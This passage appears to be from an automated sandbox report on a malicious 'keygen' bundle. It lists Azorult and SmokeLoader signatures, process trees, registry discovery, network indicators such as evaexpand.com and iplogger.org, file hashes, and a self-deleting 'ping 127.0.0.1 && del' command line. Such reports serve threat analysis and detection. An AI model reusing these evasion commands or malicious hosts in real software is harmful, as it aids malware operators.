| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2492 -ip 2492
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2492 -s 352
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
Files
memory/2492-1-0x0000000002E10000-0x0000000002F10000-memory.dmp
memory/2492-2-0x0000000002CA0000-0x0000000002CA9000-memory.dmp
memory/2492-3-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2492-5-0x0000000002CA0000-0x0000000002CA9000-memory.dmp
memory/2492-6-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2492-4-0x0000000000400000-0x0000000002B4E000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | one-online-gam3s.com | udp |
| US | 8.8.8.8:53 | oneeuropegroup.xyz | udp |
| US | 8.8.8.8:53 | gensolutions.bar | udp |
| US | 8.8.8.8:53 | 2no.co | udp |
| US | 104.21.79.229:443 | 2no.co | tcp |
| US | 104.21.79.229:443 | 2no.co | tcp |
| US | 8.8.8.8:53 | 229.79.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| N/A | 104.208.16.88:443 | tcp |
Files
memory/2544-0-0x00007FFBB8963000-0x00007FFBB8965000-memory.dmp
memory/2544-1-0x0000000000800000-0x000000000081E000-memory.dmp
memory/2544-2-0x00000000010E0000-0x00000000010FA000-memory.dmp
memory/2544-3-0x00007FFBB8960000-0x00007FFBB9421000-memory.dmp
memory/2544-5-0x00007FFBB8960000-0x00007FFBB9421000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win7-20240708-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Azorult
Azorult family
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winnetdriv.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"
C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
keygen-step-1.exe
C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
keygen-step-6.exe
C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
keygen-step-3.exe
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731243708 0
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | kvaka.li | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | kvaka.li | udp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 91.108.103.210:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 23.192.22.93:80 | www.microsoft.com | tcp |
Files
memory/2352-0-0x00000000000F0000-0x0000000000108000-memory.dmp
memory/3052-5-0x0000000000440000-0x0000000000525000-memory.dmp
C:\Windows\winnetdriv.exe
| MD5 | 265cadde82b0c66dc39ad2d9ee800754 |
| SHA1 | 2e9604eade6951d5a5b4a44bee1281e32166f395 |
| SHA256 | 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a |
| SHA512 | c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b |
memory/2084-17-0x0000000000190000-0x0000000000275000-memory.dmp
memory/3048-37-0x0000000000400000-0x0000000000420000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
138s
Command Line
Signatures
Azorult
Azorult family
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winnetdriv.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"
C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
keygen-step-1.exe
C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
keygen-step-6.exe
C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
keygen-step-3.exe
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731243720 0
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kvaka.li | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | kvaka.li | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 46.2.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 185.77.97.204:443 | evaexpand.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.97.77.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
Files
memory/4728-0-0x0000000000400000-0x00000000004E5000-memory.dmp
memory/464-7-0x0000000000BF0000-0x0000000000C08000-memory.dmp
C:\Windows\winnetdriv.exe
| MD5 | 265cadde82b0c66dc39ad2d9ee800754 |
| SHA1 | 2e9604eade6951d5a5b4a44bee1281e32166f395 |
| SHA256 | 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a |
| SHA512 | c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b |
memory/4956-23-0x0000000000400000-0x0000000000420000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win7-20240729-en
Max time kernel
122s
Max time network
126s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winnetdriv.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winnetdriv.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2384 wrote to memory of 2392 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
| PID 2384 wrote to memory of 2392 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
| PID 2384 wrote to memory of 2392 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
| PID 2384 wrote to memory of 2392 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731243711 0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
Files
memory/2384-0-0x0000000000460000-0x0000000000545000-memory.dmp
C:\Windows\winnetdriv.exe
| MD5 | 265cadde82b0c66dc39ad2d9ee800754 |
| SHA1 | 2e9604eade6951d5a5b4a44bee1281e32166f395 |
| SHA256 | 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a |
| SHA512 | c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b |
memory/2392-13-0x0000000000550000-0x0000000000635000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
147s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2180 wrote to memory of 3652 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe |
| PID 2180 wrote to memory of 3652 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe |
| PID 2180 wrote to memory of 3652 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe"
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe" -a
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe"
Network
| Country | Destination | Domain | Proto |
| SG | 37.0.10.214:80 | tcp | |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| SG | 37.0.10.244:80 | tcp | |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| MX | 31.210.20.251:80 | tcp | |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.133.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win7-20240903-en
Max time kernel
122s
Max time network
124s
Command Line
Signatures
SmokeLoader
Smokeloader family
Program crash
| Description | Indicator | Process | Target |
